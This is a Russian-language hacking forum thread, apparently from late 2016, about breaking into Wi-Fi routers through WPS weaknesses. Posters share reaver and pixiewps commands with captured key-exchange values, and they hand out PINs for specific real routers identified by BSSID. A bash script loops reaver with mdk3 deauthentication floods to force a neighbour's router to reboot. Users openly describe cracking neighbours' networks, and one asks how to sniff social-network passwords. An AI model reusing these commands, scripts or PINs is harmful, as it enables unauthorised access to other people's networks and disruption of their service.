e9:73:52:c3:4f:b1:40:9f:fb:cd:d3:f2:0f:ad:9f:3c:0a :65:95:06:41:85:63:a5:76:e1:50:2e:6f:32:75:ce -n a1:0a:e8:05:59:3b:32:59:a9:f1:6a:5e:8d:2a:2b:f4

pixiewps -e d1:79:07:73:0f:3b:79:82:97:95:95:5f:6f:11:ab:6b:3a :61:5b:79:6a:50:e3:b7:bc:be:cc:c8:a0:f8:dd:c8:d8:9 0:38:77:13:dd:d3:6b:1d:d3:07:74:f9:49:2e:60:f6:c0: 8e:c3:60:65:8f:a8:6e:2c:9c:a3:d7:74:a0:9d:0d:c7:cf :64:13:47:45:1c:88:21:3e:12:01:c3:a1:1b:a4:c7:d2:f 0:b6:2d:9c:f1:e1:4d:c4:c9:b7:78:6c:6d:81:36:33:94: 65:ec:8a:b0:59:c1:3a:6b:e5:b9:c2:18:aa:58:57:0c:36 :3e:3d:a3:cf:17:be:f4:30:12:ea:64:ca:7a:a6:32:32:f b:98:0f:eb:2b:06:f0:d7:77:54:2b:10:f0:ea:fe:2f:58: c3:04:aa:c7:a6:ba:a1:56:c1:5f:73:ad:be:37:1b:25:85 :9b:0b:46:1b:b7:4b:85:22:6e:bb:fb:72:f1:d0:fb:aa:3 b:b7:5b:e3:30:b7:cb:9d:0b -r 37:52:87:46:0d:43:a3:71:0b:68:e4:52:25:d9:93:22:3b :4e:db:a2:da:53:cf:5a:1c:9f:ae:c5:d8:5a:73:24:f6:0 9:01:b4:57:f8:ce:99:1c:e3:d9:8e:19:34:8c:11:9f:89: 82:d0:23:ff:7c:35:7f:18:fb:e4:f9:32:04:b4:17:8c:e5 :e1:3a:41:b4:54:88:02:2e:42:09:23:9e:9a:8d:fd:2c:4 e:49:32:60:c4:49:af:05:22:f6:c5:8d:82:7e:d7:7d:6e: 54:ed:2f:59:d1:3c:ac:e1:06:40:41:08:36:b0:e7:c4:5d :b6:c4:33:32:71:99:7d:b9:bd:c9:52:d3:22:a8:0f:5e:5 1:61:b7:27:99:81:bd:4a:b4:fb:54:bf:91:11:df:4f:b4: a7:87:52:cb:fd:53:7a:d7:14:ce:7b:98:d6:e3:2e:e4:ae :67:4a:74:9b:07:96:d9:46:a6:19:0c:a6:63:68:db:cf:5 9:75:d8:0e:b1:7d:4a:47:62 -s ea:c3:41:08:70:0b:4e:44:3a:39:1a:f0:f6:ab:95:33:ee :26:e0:50:ac:5d:2b:61:69:79:24:69:e5:71:8d:6b -z 80:0d:b7:c1:e6:e5:03:c1:49:53:94:f7:b1:95:dd:62:56 :a7:ce:25:9c:66:95:6c:0c:a2:bf:9a:18:ff:0c:31 -a 64:48:94:af:66:93:f1:6f:aa:d6:bf:33:92:0b:e0:9a:a0 :9c:be:36:a5:bc:15:80:e5:cb:40:2d:62:60:88:f5 -n 38:52:3f:cf:bc:bf:0b:d8:33:4d:23:cf:ac:e3:c4:00

atlas28
10.11.2016, 06:37
Аналогично, недавно появился, скорее всего с последней прошивкой

Ранее был в поле видимости похожий, но он все-таки поддался с 30-50 попыток



Да, в моем случае роутер тоже новый, только недавно появился. Насчет 30-50 попыток попробую затестить, просто WPS отключается (именно отключается, а не лочится) после нескольких неудачных попыток. Кстати говоря, раньше тоже не всегда с первой попытки пин находился. Частенько со 2-3 только.

atlas28
10.11.2016, 13:15
но он все-таки поддался с 30-50 попыток



Закидал deauth пакетами и добился того, чтобы его еще пару раз ребутнули. В итоге pixiewps атака проканала. Интересная картина получается.

А самое смешное, что это оказался обычный 24-bit PIN

farkos
10.11.2016, 13:35
картина может быть обычной если учитывать возможные состояния исследуемого роутера. может у самого пользователя работает кое как по ряду причин, проблемы с питанием и т.д.

Anton91x
11.11.2016, 00:00
Да, в моем случае роутер тоже новый, только недавно появился. Насчет 30-50 попыток попробую затестить, просто WPS отключается (именно отключается, а не лочится) после нескольких неудачных попыток. Кстати говоря, раньше тоже не всегда с первой попытки пин находился. Частенько со 2-3 только.



Если отключается, значит старая прошивка 2.00-2.03

Лочится они начинают от 2.04 и выше

Anton91x
11.11.2016, 00:07
Если не блокируется, то поставить на вечный перебор пина 00000000.

Авось хозяин кнопочку нажмёт.



Ну это как то не серьезно

А долбить его mdk3 в это время вам религия не позволяет?

Включить атаку дня на два

У хозяина пропадет интернет

Тогда уж точно нажмет, будет давить на все кнопки

Так можно взломать любой роутер с включенным wps

Да и зачем 00000000

Просто из под винды 7,8 или 10 пытаемся подключиться и ждем пока нажмут

Anton91x
11.11.2016, 01:08
Подскажите пин к ADSL роутеру D-Link DSL-2640U, прошивка с большой вероятностью от ростелекома 2.5.3, BSSID 90:8D:78:B5:35:04? Статичные пины длинка перепробовал. Роутер лочится до перезагрузки после 10 неверных пинов даже если их перебирать с интервалом в час.



Я как то взламывал D-Link DSL-2640U и тоже от провайдера ростелеком, по-моему pin начинался на 38, но я его не помню, попробуйте подобрать 3 и 4 цифру

Попробуйте еще 31957199, 21464065

binarymaster
11.11.2016, 01:24
Ну это как то не серьезно

А долбить его mdk3 в это время вам религия не позволяет?



В том посте речь шла о моделе роутера, который в принципе не принимает пин коды, только при нажатой кнопке WPS принимает код 00000000.



Тогда уж точно нажмет, будет давить на все кнопки



От долбёжки маловероятно, что кто-то нажмёт кнопку, только перезагружать будут. Сужу по опыту.



Просто из под винды 7,8 или 10 пытаемся подключиться и ждем пока нажмут



Это что-то новенькое.

atlas28
11.11.2016, 09:33
Если отключается, значит старая прошивка 2.00-2.03

Лочится они начинают от 2.04 и выше



v2.02(AAKV.1)A4 была в моем случае

binarymaster
11.11.2016, 11:02
я к своему роутеру так подключался



Само собой... но мы тут чаще обсуждаем общие случаи, когда физического доступа к кнопке нет.

Triton_Mgn
11.11.2016, 11:23
Vfrcbv



Само собой... но мы тут чаще обсуждаем общие случаи, когда физического доступа к кнопке нет.


Максимум рубильник

basil1949
11.11.2016, 11:50
Кто-нибудь сталкивался с точкой доступа на Androide (имя роутера Android_4816, так показывает программа WiFiInfoView). WPS присутствует. Можно ли её сломать при помощи WPS-инструментария. У меня не получилось. В лучшем случае всё заканчивалось бесконечным повторением...

DSL2650NRU
11.11.2016, 21:29
Я как то взламывал D-Link DSL-2640U и тоже от провайдера ростелеком, по-моему pin начинался на 38, но я его не помню, попробуйте подобрать 3 и 4 цифру

Попробуйте еще 31957199, 21464065



Спасибо за ответ. Эти пины я тоже уже попробовал. Я нашел только одну точку с похожим маком в базе 3wifi и ее wps пин ни на какие алгоритмы не похож и не статический. Наверно росийские инженеры длинка читают античат

mazik
12.11.2016, 09:35
"КАРТИНКИ РОУТЕРОВ"

парсер картинок Google по ключевому слову ( 170кб -маленькая)

http://rgho.st/7QfJVVCYm

Роутеры.

Девочки.

Любые ФОТО.

Anton91x
14.11.2016, 20:07
Спасибо за ответ. Эти пины я тоже уже попробовал. Я нашел только одну точку с похожим маком в базе 3wifi и ее wps пин ни на какие алгоритмы не похож и не статический. Наверно росийские инженеры длинка читают античат


Я не знаю что они там читают

Я скачивал инструкции по настройке роутеров DSL-2640U, DSL-2750U, DSL-2500U и др.

С официального сайта D-Link

Там все в картинках (скриншоты веб морды)

Там видны пины. И эти пины подходят к Длинкам

Не думал что разработчики настолько...

Anton91x
14.11.2016, 20:09
"КАРТИНКИ РОУТЕРОВ"

парсер картинок Google по ключевому слову ( 170кб -маленькая)

http://rgho.st/7QfJVVCYm

Роутеры.

Девочки.

Любые ФОТО.



СПАМ!

ПО ССЫЛКЕ ТРОЯН

saimonyz
14.11.2016, 21:21
кто нибудь решил проблему с

wps transaction failed (code 0x02) re-trying last pin ?

wps transaction failed (code 0x03) re-trying last pin ?

wps transaction failed (code 0x04) re-trying last pin ?

maus
14.11.2016, 21:40
кто нибудь решил проблему с

wps transaction failed (code 0x02) re-trying last pin ?

wps transaction failed (code 0x03) re-trying last pin ?

wps transaction failed (code 0x04) re-trying last pin ?



- спроси у них:

https://code.google.com/archive/p/reaver-wps/issues

DSL2650NRU
14.11.2016, 22:52
Я не знаю что они там читают

Я скачивал инструкции по настройке роутеров DSL-2640U, DSL-2750U, DSL-2500U и др.

С официального сайта D-Link

Там все в картинках (скриншоты веб морды)

Там видны пины. И эти пины подходят к Длинкам

Не думал что разработчики настолько...



90:8D:78:B5:18:B4 ROSTELECOM_655F WPS 28616368 Вот эта точка из базы. Пин никак не привязывается к маку.

Anton91x
16.11.2016, 17:03
90:8D:78:B5:18:B4 ROSTELECOM_655F WPS 28616368 Вот эта точка из базы. Пин никак не привязывается к маку.



Я знаю

mazik
17.11.2016, 14:10
"КАРТИНКИ РОУТЕРОВ"



Результат Проверки

https://www.virustotal.com/ru/file/...fe25afcce938bba7757662f95e6ad78ed45/analysis/



СПАМ! ПО ССЫЛКЕ ТРОЯН



*Онлайн-антивирусы*

http://www.comss.ru/list.php?c=online_antivirus

binarymaster
19.11.2016, 17:15
От 36-bit PIN реальный пин меньше на величину X, которая линейно растет вместе с маком. В пределах старшего бита NIC от мака к маку X увеличивается на половину от разницы маков.



Ну это я знаю. Младший бит NIC просто не используется, обрезается при вычислении пина.

Помню я где-то прикреплял XLS файл с расчётами. Но алгоритм пока никто не нашёл, в качестве обходного пути Felis-Sapiens реализовал детектор линейных последовательностей.

basil1949
19.11.2016, 18:58
Можно ли разобраться с точкой доступа на Android ( так я думаю , 72 mbit/sec) ? WPS включен, но PixieWPS, GoyskriptWPS - не помогают ... Всё крутится вокруг M1 и M2 и ни с места.

DSL2650NRU
19.11.2016, 20:14
Вот тут это было:

https://forum.antichat.ru/posts/3895917

Я тоже пока не нашёл точки отсчёта, но она явно непостоянна. Вот тут некоторые мои вычисления по этому делу:

http://rghost.ru/7MgpCwFDH



Файл удален. Если можно, перезалейте пожалуйста.

binarymaster
19.11.2016, 21:02
Файл удален. Если можно, перезалейте пожалуйста.



http://rgho.st/7fBDBHWSJ

DSL2650NRU
19.11.2016, 21:25
http://rgho.st/7fBDBHWSJ



Спасибо! И последняя просьба - почему Вы считаете, что младший бит не используется при расчетах?

binarymaster
19.11.2016, 21:56
И последняя просьба - почему Вы считаете, что младший бит не используется при расчетах?



Деление на 2 равноценно битовому сдвигу вправо на 1 младший бит.

Akira
21.11.2016, 01:35
Здравствуйте, помогите пожалуйста подобрать пин wps.

WiFi-DOM.ru-0404

04:a1:51:5e:c0:8a

2462 MHz, CH. 11

[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][WPS][ESS]

NETGEAR

Хендшейк никак не получается подобрать, спасибо.

binarymaster
21.11.2016, 02:43
Здравствуйте, помогите пожалуйста подобрать пин wps.



Try this: 16769212

lemonvoice
22.11.2016, 02:13
Доброго времени суток! Возникла проблема: происходит безошибочный перебор пинов wps, все хорошо, доходит примерно до 5% и зацикливается на receive timeout occurred. Сигнал при этом отличный. Если после этого начать заново с нуля, то уже и до 5% не доходит, а сразу появляется receive timeout occurred. Кто сталкивался или знает решение отпишитесь, пожалуйста. Возможно этот вопрос уже задавался, тогда не ругайтесь, а просто дайте ссылку.

На всякий случай: при всем этом использовался kali 1.1.0, реавер 1.4, адаптер tplink 7200, команды:

iwconfig

airmon-ng start wlan0

airmon-ng check kill

airodump-ng mon0

wash -i mon0 -C

reaver -i mon0 -c 11 -b mac -va -vv --dh-small --no-nacks

lemonvoice
22.11.2016, 14:26
Доброго времени суток! Возникла проблема: происходит безошибочный перебор пинов wps, все хорошо, доходит примерно до 5% и зацикливается на receive timeout occurred. Сигнал при этом отличный. Если после этого начать заново с нуля, то уже и до 5% не доходит, а сразу появляется receive timeout occurred. Кто сталкивался или знает решение отпишитесь, пожалуйста. Возможно этот вопрос уже задавался, тогда не ругайтесь, а просто дайте ссылку.

На всякий случай: при всем этом использовался kali 1.1.0, реавер 1.4, адаптер tplink 7200, команды:

iwconfig

airmon-ng start wlan0

airmon-ng check kill

airodump-ng mon0

wash -i mon0 -C

reaver -i mon0 -c 11 -b mac -va -vv --dh-small --no-nacks



Пробовал команду: "while true; do timeout -s SIGINT 80s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 5; timeout 20s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 250 -m; sleep 20; done;"

но ТД не перезагрузилась, какие параметры в этой команде изменить, чтобы усилить нагрузку на ТД, чтобы все-таки привести ее к перезагрузке

lemonvoice
22.11.2016, 16:43
Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3.

Вот его код:


#!/bin/sh
while true;
# Run reaver to work 50s
do timeout -s SIGINT 50s reaver -i mon0 -b 64:66:B3:AC:XX:XX -N -S -L -s /etc/reaver/6466B3ACXXXX.wpc -v;
sleep 4;
# Run mdk3 to work 10s
echo [+] Mdk3 is working ...
timeout 10s mdk3 mon0 a -a 64:66:B3:AC:XX:XX -m &>/dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C] ;
sleep 24;
done;

У меня он не заработал и я его переделал:


#!/bin/bash
while true;
# Run reaver to work 10 pin
echo
echo
echo [+] reaver is working ...
do
reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc;

# Run mdk3 to work 3s
echo
echo
echo [+] Mdk3 is working ...
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
sleep 3;
killall mdk3 2> /dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
sleep 14;
done;

и меньше чем за сутки взломал эту сеть!

sleep 3 - это сколько секунд шарашит mdk3

sleep 14 - пауза до появления точки в эфире

-g 10 - сколько пинов перебирать

Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c.

Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов.



Эти скрипты прописывать одной строкой? (в смысле одной командой разом). Если да, то как это будет выглядеть? Заранее спасибо и извиняюсь за небольшой флуд в теме

loshe
26.11.2016, 10:53
Подскажите пин для ZTE zxhn h118n mac 78:96:82:79:FE: D9

СЕРЖ32
29.11.2016, 00:12
а кто тестил

AUTOPIXIEWPS?в чём отличие от просто PIXIEWPS?это новинка какая то,в посденим wifi slax уже присутствует...

henri2002
29.11.2016, 00:22
а кто тестил

AUTOPIXIEWPS?в чём отличие от просто PIXIEWPS?это новинка какая то,в посденим wifi slax уже присутствует...


судя по названию автоматом все сети проверяет, в аирслаксе тоже такая фишка есть.

СЕРЖ32
29.11.2016, 00:26
т



судя по названию автоматом все сети проверяет, в аирслаксе тоже такая фишка есть.



а не,этот скрипт и так всё автоматом делает,фишка в чём то другом

Triton_Mgn
29.11.2016, 01:21
т

а не,этот скрипт и так всё автоматом делает,фишка в чём то другом



в пизду тебя все ждали, что поумнеешь. Linset? Опять арабские морды

binarymaster
29.11.2016, 01:25
тебя все ждали, что поумнеешь.



Не-не, мы все просто ждали, а этого никто не ждал.

petr333
29.11.2016, 11:27
Здравствуйте, помогите пожалуйста подобрать пин wps

mts_42184

1C:5F:2B:9A:27:E2

Зарание спасибо

1D1
04.12.2016, 16:37
посоветуйте пожалуйста как подобрать пин на ZTE ZXHN H298N BSSID: C4:A3:66:63:C7:E0

reaver -i wlan0mon -b C4:A3:66:63:C7:E0 -c 1 -a -vv?

aramaz
06.12.2016, 21:55
Здравствуйте, помогите пожалуйста подобрать пин wps:

E8:94:F6:42:B1:C4

00:06:31:80:E4:47

70:9F:2D:97:26:B0

90:67:1C:8D:66:A0

A0:F3:C1:AD:B4:32

C8:3A:35:08:B1:98

_69_mf_
07.12.2016, 07:43
Привет, подскажите пин пожалуйста.

40:4a:03:77:af:09

Zyxel keenetic 4g

ewgen24
07.12.2016, 10:19
Привет, подскажите пин пожалуйста.

40:4a:03:77:af:09

Zyxel keenetic 4g



попробуй:78435933

loshe
07.12.2016, 16:04
Кстати сегодня тоже 12 значный пароль ростелекомовский через airodump показало . Давно хотел взломать .но здесь никто такие не перебирает . Просто обратил внимание на 12 значное число справа где обычно ssid показывает . И реально подошел . Не знаю как airodump работает но факт есть факт

_69_mf_
07.12.2016, 16:05
попробуй:78435933



Не прошёл(

loshe
08.12.2016, 19:35
Народ . Все интересна тема про airodump. http://rgho.st/private/8qYQbT7qd/8b5d4e1e4d7733eadc4f5b970ad5d714 .

Вот он сам показывает реальные пароли ... И это не единичный случай . Еще показывал пароль XLHA3XWP что тоже похоже на дефолтный пароль ростелекома. Может есть тут какая то закономерность ?

hydra
08.12.2016, 19:55
На вопрос не отвечу.У меня тоже так частенько бывало.Но пароль ни разу не подошёл.А у людей подходили.

Ну а вообще,явление довольно интересное.Возможно,связан о с каким-то косяком в WPA.А может с чем нибудь другим.

Я как-то пытался гуглить эту тему,но ничего интересного не нашёл.

Кто-то из олдовых здесь высказывал предположение.Что скорее всего это происходит из-за того,что

при подключении к точке,люди по ошибке или незнанию,вводят вместо ESSID,пароль WPA.

А дивайсы на Android,как известно,запоминают это дело.Вот и отсвечивают в эфире пассом.

Хотя мне непонятно,зачем на Android,вводить ESSID.Ну только если к скрытой сети.

loshe
08.12.2016, 20:19
На вопрос не отвечу.У меня тоже так частенько бывало.Но пароль ни разу не подошёл.А у людей подходили.

Ну а вообще,явление довольно интересное.Возможно,связан о с каким-то косяком в WPA.А может с чем нибудь другим.

Я как-то пытался гуглить эту тему,но ничего интересного не нашёл.

Кто-то из олдовых здесь высказывал предположение.Что скорее всего это происходит из-за того,что

при подключении к точке,люди по ошибке или незнанию,вводят вместо ESSID,пароль WPA.

А дивайсы на Android,как известно,запоминают это дело.Вот и отсвечивают в эфире пассом.






На вопрос не отвечу.У меня тоже так частенько бывало.Но пароль ни разу не подошёл.А у людей подходили.

Ну а вообще,явление довольно интересное.Возможно,связан о с каким-то косяком в WPA.А может с чем нибудь другим.

Я как-то пытался гуглить эту тему,но ничего интересного не нашёл.

Кто-то из олдовых здесь высказывал предположение.Что скорее всего это происходит из-за того,что

при подключении к точке,люди по ошибке или незнанию,вводят вместо ESSID,пароль WPA.

А дивайсы на Android,как известно,запоминают это дело.Вот и отсвечивают в эфире пассом.



Вот только это уже слишком часто случается . И куда можно вводить пароль вместо Essid . Точнее вообще куда нужно вводить ESSID ? вот это непонятно . Просто обычные пользователи как мои соседи , которые 100% не занимаются такими вещами как я ) там просто некому ) вот куда им нужно ввести Essid ? А вместо этого они вводят пароль ? )) Причем в этой теме уже писали про это ) про то что точек пять чтоли взомали ...

TOX1C
08.12.2016, 20:24
Это юзеры чудят, набирая не то и не туда. Сам с таким встречался.

http://s018.radikal.ru/i527/1612/7d/dc63155d2a1c.jpg

loshe
08.12.2016, 20:32
Это юзеры чудят, набирая не то и не туда. Сам с таким встречался.

http://s018.radikal.ru/i527/1612/7d/dc63155d2a1c.jpg



Так дело в том что . Есть люди которые набирают то и туда ) что потом airodump выдает их пароли ... Все же сомневаюсь в случайности ...

hydra
08.12.2016, 20:37
Так дело в том что . Есть люди которые набирают то и туда ) что потом airodump выдает их пароли ... Все же сомневаюсь в случайности ...



А откуда такая уверенность,что набирают то,и туда?

loshe
08.12.2016, 20:40
Да уж слишком часто просто ...

loshe
08.12.2016, 20:47
На 169 странице тоже писали . Что 5 точек так взломали ...

hydra
08.12.2016, 20:52
Да уж слишком часто просто ...



Ну это ведь ничего не доказывает.Не разбирающихся в этих делах людей,намного больше чем тех,кто хоть что-то знает.

Возьми для примера,хоть своих друзей,знакомых.Вот у меня,например много знакомых.Но только один из них,сможет самостоятельно настроить свой роутер.

hydra
08.12.2016, 20:54
Что 5 точек так взломали



Ну "взломали" то наверное громко сказано.

loshe
08.12.2016, 20:58
Ну "взломали" то наверное громко сказано.


Ну так то да )

khamyk
09.12.2016, 01:28
Возможно это срабатывает на скрытых точках. При подключении выскакивает окошко где сначала просят ввести Имя точки и видимо неопытные вводят пароль вместо essid.

loshe
09.12.2016, 03:49
Да нет . Конкретно моя точка всегда была в поле зрения )

thefog
10.12.2016, 01:56
зарегистрировался чтоб у всезнающего Сержа32 спросить: ты что за человек такой?

sasha_mn
10.12.2016, 12:41
замечено, у кабельного модема Upvel d4:bf:7f wpa key по умолчанию = mac +3

пример mac- d4:bf:7f:04:1f:60 key - d4bf7f041f63

binarymaster
10.12.2016, 13:28
замечено, у кабельного модема Upvel d4:bf:7f wpa key по умолчанию = mac +3

пример mac- d4:bf:7f:04:1f:60 key - d4bf7f041f63



Факт. Но это не относится к уязвимостям в протоколе WPS.

tisma
12.12.2016, 18:11
Здравствуйте, подскажите пожалуйста пин к ZyXEL Keenetic GIGA

CC-5D-4E-DA-43-5E

В программе Dumpper показывает пин 43040940, но он не подходит

И что значит зеленая надпись SI?

http://pixs.ru/showimage/1jpg_7519391_24392221.jpg

В списке точек на всех красные точки, а на этой синяя

http://pixs.ru/showimage/2jpg_5981551_24392537.jpg

fire-dance
12.12.2016, 21:06
Здравствуйте, подскажите пожалуйста пин к ZyXEL Keenetic GIGA

CC-5D-4E-DA-43-5E

В программе Dumpper показывает пин 43040940, но он не подходит

И что значит зеленая надпись SI?

http://pixs.ru/showimage/1jpg_7519391_24392221.jpg

В списке точек на всех красные точки, а на этой синяя

http://pixs.ru/showimage/2jpg_5981551_24392537.jpg



si - это доступ к алгоритму подбора пин он подходит и то что синим значит что пин код верен может у вас слаб сигнал?

qwertys76
12.12.2016, 21:21
у меня под линуксом так ничего и не вышло. не смог установить драйвера на карту. да собственно под виндой уже привык . удобно да и комп не занят .можно другими делами заниматься

fire-dance
12.12.2016, 21:25
Здравствуйте, подскажите пожалуйста пин к ZyXEL Keenetic GIGA

CC-5D-4E-DA-43-5E

В программе Dumpper показывает пин 43040940, но он не подходит

И что значит зеленая надпись SI?

http://pixs.ru/showimage/1jpg_7519391_24392221.jpg

В списке точек на всех красные точки, а на этой синяя

http://pixs.ru/showimage/2jpg_5981551_24392537.jpg



также возможно пин сменили вручную

СЕРЖ32
18.12.2016, 23:03
когда уже pixiewps будет подходить вообще ко всем точкам?а то как то неинтересно,мало точек,которые подходят для pixiewps,вот мне нужно Atheros открыть,а на него pixiewps не действует,хотя все хешы отдаёт....странно,если все хешы отдаёт,чего пин не вычисляеться....?

binarymaster
18.12.2016, 23:50
странно,если все хешы отдаёт,чего пин не вычисляеться....?



Там не только хеши, в частности там Nonce - последовательности псевдослучайных байтов. Уязвимы к атаке те, которые некачественно сгенерированы (предсказуемы).

Было бы странно, если бы точка их не отдавала. Всё в рамках протокола.

СЕРЖ32
19.12.2016, 00:29
Там не только хеши, в частности там Nonce - последовательности псевдослучайных байтов. Уязвимы к атаке те, которые некачественно сгенерированы (предсказуемы).

Было бы странно, если бы точка их не отдавала. Всё в рамках протокола.



тогда зачем в pixie wps ключ -P?(типа на м3 пакете делает петтлю,как то так описано)чьл просто даёт этот ключ?кстати и ключ -W 2 тоже к определённым точкам походит,хотя даже от тп линка показывает якобы правильный пин(ну типа есть пины с минусом,а один всегда с плюсом,а так всё равно не верный)

DSL2650NRU
19.12.2016, 18:27
тогда зачем в pixie wps ключ -P?(типа на м3 пакете делает петтлю,как то так описано)чьл просто даёт этот ключ?кстати и ключ -W 2 тоже к определённым точкам походит,хотя даже от тп линка показывает якобы правильный пин(ну типа есть пины с минусом,а один всегда с плюсом,а так всё равно не верный)



Ключ -P для того, чтобы не лочить точки при работе с pixiewps.

СЕРЖ32
19.12.2016, 23:48
Ключ -P для того, чтобы не лочить точки при работе с pixiewps.



так тогда нет и перебора пинов,если -P поставить,так как приходят пакеты м1 и м2,а ведь полноценный перебор,это когда и м3 и м4 пакеты.Ну не лоситься точка ну и толку с этого,перебора пинов же нет....

DSL2650NRU
20.12.2016, 07:31
так тогда нет и перебора пинов,если -P поставить,так как приходят пакеты м1 и м2,а ведь полноценный перебор,это когда и м3 и м4 пакеты.Ну не лоситься точка ну и толку с этого,перебора пинов же нет....



Ривер с пикси (-K 1) и ривер-перебор пинов - это как кислое и теплое. Немного разные вещи. Ключ -P есть смысл использовать только для получения хэшей и Nonce - последовательностей и при этом не тратить попытки до лока.

СЕРЖ32
21.12.2016, 00:39
Ривер с пикси (-K 1) и ривер-перебор пинов - это как кислое и теплое. Немного разные вещи. Ключ -P есть смысл использовать только для получения хэшей и Nonce - последовательностей и при этом не тратить попытки до лока.



так а для чего получать хешы и Nonce, вернее много хешей и много Nonce ?я так понял,что нужны самые первые хешы,что бы в offline вычислить пин,а если поставить -P,то просто будет много хешей,ну и что дальше то делать?каждый хеш что ли проверять?

binarymaster
21.12.2016, 00:48
так а для чего получать хешы и Nonce, каждый хеш что ли проверять?



Они имеют смысл только все вместе. Глянь спецификацию протокола WPS.

Triton_Mgn
21.12.2016, 00:56
Пол года плохая погода, нонсенс

Был же примерный пример на tp-link 841

СЕРЖ32
21.12.2016, 00:58
Они имеют смысл только все вместе. Глянь спецификацию протокола WPS.



та я знаю,что нужны все вместе,просто для чего конкретно -Р?ну вот я сейчас такой ключ задал,ну работает ривер,заваливает хэш за хэшем,ну и что.....дальше то что,что с этим делать?та и ключ -К 1 подходит к определённым чипсетам,а так вообще смысла -К 1 нет,если чипсет не подходящий,ривер сразу покажет,что пин не найден и прога остановится,а без -К 1,но с -Р просто собираются хешы и тд.....просто дальше то что с ними делать....?

Кстати,какие ещё полезные ключи подставить нужно?ну вот -f эффективно?типа форсаж перебора или как то так....

СЕРЖ32
21.12.2016, 01:00
Пол года плохая погода, нонсенс

Был же примерный пример на tp-link 841


та тп линки на атерос вообще не ломаемы с pixiewps,там пофиг какие ключи прописывать...

binarymaster
21.12.2016, 02:18
а без -К 1,но с -Р просто собираются хешы и тд.....просто дальше то что с ними делать....?



Экспериментировать. Удобно же, и Wireshark запускать не надо.

СЕРЖ32
21.12.2016, 02:28
Экспериментировать. Удобно же, и Wireshark запускать не надо.



ну как именно?можно подробней написать,как эксперементировать?все хешы просто проверять?так это долго,так тысячи хешей насобирать можно....

binarymaster
21.12.2016, 02:41
ну как именно?можно подробней написать,как эксперементировать?все хешы просто проверять?



Каждый экспериментирует по-своему, в рамках своих умений, знаний, идей и размышлений.

Здесь нельзя сказать конкретно, что делать с ними.

Ebaklak
21.12.2016, 09:07
Пацы такой вопрос надо очень провернуть у меня мак раздает вай как мне засниффить пароль вк ?

СЕРЖ32
23.12.2016, 01:32
кстати,кто пробовал в pixiewps поставить ключ -P .насобирать десяток разных хешей и потом их прогнать?просто неудобно эти хешы подставлять,долго......может автоматическое что то уже есть,не?

TOX1C
23.12.2016, 18:36
а алгоритм wps для tplink еще нету?



Еще нету, да и никто им не занимается, по крайней мере не слышал ничего об этом.

tihan2007
23.12.2016, 23:23
Доброе время суток, прошу помощи, интересует WPS PIN для роутера TOTOLINK N300RT 78:44:76:A3:96:3C. Был использован 07208287 | 24-bit PIN и pixiewps результат нулевой, какие еще возможны варианты?

binarymaster
23.12.2016, 23:47
результат нулевой, какие еще возможны варианты?



И неудивительно, потому что вы не воспользовались генератором WPS PIN на сайте 3WiFi.

Пробуйте 01042702 и 99956042.

tihan2007
24.12.2016, 00:24
Им и пользовался, только не те пины это понятно 99956042 | Static PIN - Onlime, а этого нет в Оффлайн генераторе 01042702? P.S.: понял 01042702 это Static PIN 01042702 90%

x10
24.12.2016, 05:48
Доброй ночи, господа!

Немного предыстории ) началось все с того что соседи сменили пороль от вай фая. Проблем особых не составило взломать их повторно, благо лазейку я себе оставил включив WPS. (благо не шарят). Что их понудило на это... пользовался ихней сетью в исключительно редких случаях.

Ну ладно поехали дальше... Наткнулся я на очередного соседа с вкл WPS, роутер MGTS_GPON **** о думаю счастье привалило как бы не так, столкнулся с проблемой



WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

Ну думаю все доигрался ( попробывал следующую комнду

reaver -i wlan0mon -b 94:4A:0C:40:40:9D -a -vv -L -K 1 вроде дело пошло но как мне кажется все стоит на месте результат

[P] WPS Manufacturer: SERCOMM

[P] WPS Model Name: RV6688BCM

[P] WPS Model Number: RV6688BCM

[P] Access Point Serial Number: 53434F4D14181906

[+] Received M1 message

[P] R-Nonce: 37:e6:e2:c8:67:22:b1:20:80:40:3b:2e:e5:c3:f6:86

[P] PKR: bc:de:1f:4e:ba:8e:b4:65:f4:78:0a:c7:d4:2c:85:9d:e0 :af:d5:6f:d4:ed:cf:74:b0:47:d8:20:b3:52:cb:f2:a2:8 b:90:46:68:06:ce:fc:c9:a2:f7:2f:a3:9c:07:90:d9:86: 71:43:fe:47:12:c1:19:8c:44:98:40:77:a0:12:a8:c1:6b :b5:28:bc:cf:dd:c7:89:3b:53:ae:05:0b:cf:18:a6:a3:4 a:14:d6:6d:d0:e5:a1:16:b9:4b:58:ac:49:8d:19:42:b4: 1a:c8:f2:9f:ed:57:a7:17:8f:be:97:7a:ab:c0:10:5a:e8 :14:49:fa:7a:fd:5e:b8:ea:37:9b:19:a2:bf:3d:da:86:f b:40:5b:99:33:4b:90:8d:33:62:26:36:96:ec:bd:ad:05: a1:01:61:53:41:bb:41:30:ca:ba:df:2e:a1:bf:c4:71:5a :33:3a:00:42:43:5b:63:dd:6a:c2:db:b5:07:0c:0d:5f:f a:7a:38:de:0f:73:d2:28:98

[P] AuthKey: 9a:96:cf:56:50:36:9f:14:2e:8f:fb:87:fe:f6:83:86:21 :84:d6:f0:99:1b:a3:78:d1:f4:c8:9b:a5:b8:a2:8e

[+] Sending M2 message

[+] Received WSC NACK

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x04), re-trying last pin

[+] Trying pin 88885674.

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

